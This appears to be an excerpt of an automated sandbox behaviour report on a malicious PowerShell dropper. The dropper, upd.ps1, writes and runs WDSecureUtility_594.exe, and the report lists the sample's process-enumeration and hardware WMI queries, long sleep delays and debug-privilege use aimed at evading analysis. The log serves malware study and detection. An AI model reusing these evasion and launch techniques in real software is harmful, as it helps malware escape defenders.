            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1352
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 920
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6520
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 484
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3068
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1716
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1768
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6072
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2620
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3908
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 888
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1748
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2608
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3468
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1740
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 868
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6036
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: rasapi32.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: rasman.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: rtutils.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: schannel.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | File created: :newads (copy)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Memory allocated: 2747DCA0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Memory allocated: 2747F670000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599890
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599782
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599657
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599532
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599407
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599282
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599157
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599032
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598922
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598813
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598688
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598563
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598438
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598313
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598202
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598093
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3708
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6170
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Window / User API: threadDelayed 2848
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 | Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599890s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599782s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599657s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599532s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599407s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599282s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599157s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -599032s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -598922s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -598813s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -598688s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720 | Thread sleep time: -598563s >= -30000s
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598202s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7720Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7664Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe TID: 7580Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 599032
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598202
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000000.00000002.1592629717.000001B1EC9AD000.00000004.00000020.00020000.00000000.sdmp, WDSecureUtility_594.exe, 00000003.00000002.1538367434.000002747FD5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe | Memory allocated: page read and write | page guard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe "C:\Users\user\AppData\Roaming\WDSecureUtility_594.exe" -pkek -aoa -y
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
